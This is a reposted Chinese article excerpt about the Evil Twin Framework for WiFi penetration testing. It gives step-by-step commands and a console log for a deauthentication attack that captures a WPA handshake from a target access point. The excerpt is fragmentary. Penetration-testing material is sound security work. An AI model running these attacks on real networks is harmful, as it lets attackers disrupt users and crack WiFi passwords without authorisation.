加入收藏 | 设为首页 | 会员中心 | 我要投稿 惠州站长网 (https://www.0752zz.com.cn/)- 办公协同、云通信、物联设备、操作系统、高性能计算!
当前位置: 首页 > 建站 > 正文

专业 WiFi 渗透测试工具

发布时间:2019-02-28 07:53:21 所属栏目:建站 来源:Linux技术
导读:副标题#e# 了解一款用于对 WiFi 接入点安全进行渗透测试的工具。 -- Andr Esser 越来越多的设备通过无线传输的方式连接到互联网,以及,大范围可用的 WiFi 接入点为攻击者攻击用户提供了很多机会。通过欺骗用户连接到 虚假的 WiFi 接入点 ,攻击者可以完全

ETF 启用了 AirScanner 模块并分析 IEEE 802.11 数据帧来发现 WPA 握手包。然后 AirInjecto 就可以使用解除认证攻击来强制客户端断开连接,以进行重连。必须在 ETF 上执行下面这些步骤才能完成上面的目标:

  1. 进入 AirScanner 配置模式:config airscanner
  2. 设置 AirScanner 不跳信道:config airscanner
  3. 设置信道以嗅探经过 WiFi 接入点信道的数据(APC):set fixed_sniffing_channel = <APC>
  4. 使用 CredentialSniffer 插件来启动 AirScanner 模块:start airscanner with credentialsniffer
  5. 从已嗅探的接入点列表中添加目标接入点的 BSSID(APS):add aps where ssid = <APS>
  6. 启用 AirInjector 模块,在默认情况下,它会启用解除认证攻击:start airinjector

这些简单的命令设置能让 ETF 在每次测试时执行成功且有效的解除认证攻击。ETF 也能在每次测试的时候捕获 WPA 的握手数据包。下面的代码能让我们看到 ETF 成功的执行情况。

  1. ███████╗████████╗███████╗ 
  2. ██╔════╝╚══██╔══╝██╔════╝ 
  3. █████╗ ██║ █████╗ 
  4. ██╔══╝ ██║ ██╔══╝ 
  5. ███████╗ ██║ ██║ 
  6. ╚══════╝ ╚═╝ ╚═╝ 
  7. [+] Do you want to load an older session? [Y/n]: n 
  8. [+] Creating new temporary session on 02/08/2018 
  9. [+] Enter the desired session name: 
  10. ETF[etf/aircommunicator/]::> config airscanner 
  11. ETF[etf/aircommunicator/airscanner]::> listargs 
  12. sniffing_interface = wlan1; (var) 
  13. probes = True; (var) 
  14. beacons = True; (var) 
  15. hop_channels = false; (var) 
  16. fixed_sniffing_channel = 11; (var) 
  17. ETF[etf/aircommunicator/airscanner]::> start airscanner with 
  18. arpreplayer caffelatte credentialsniffer packetlogger selfishwifi 
  19. ETF[etf/aircommunicator/airscanner]::> start airscanner with credentialsniffer 
  20. [+] Successfully added credentialsniffer plugin. 
  21. [+] Starting packet sniffer on interface 'wlan1' 
  22. [+] Set fixed channel to 11 
  23. ETF[etf/aircommunicator/airscanner]::> add aps where ssid = CrackWPA 
  24. ETF[etf/aircommunicator/airscanner]::> start airinjector 
  25. ETF[etf/aircommunicator/airscanner]::> [+] Starting deauthentication attack 
  26. - 1000 bursts of 1 packets 
  27. - 1 different packets 
  28. [+] Injection attacks finished executing. 
  29. [+] Starting post injection methods 
  30. [+] Post injection methods finished 
  31. [+] WPA Handshake found for client '70:3e:ac:bb:78:64' and network 'CrackWPA' 

使用 ARP 重放攻击并破解 WEP 无线网络

(编辑:惠州站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

推荐文章
    热点阅读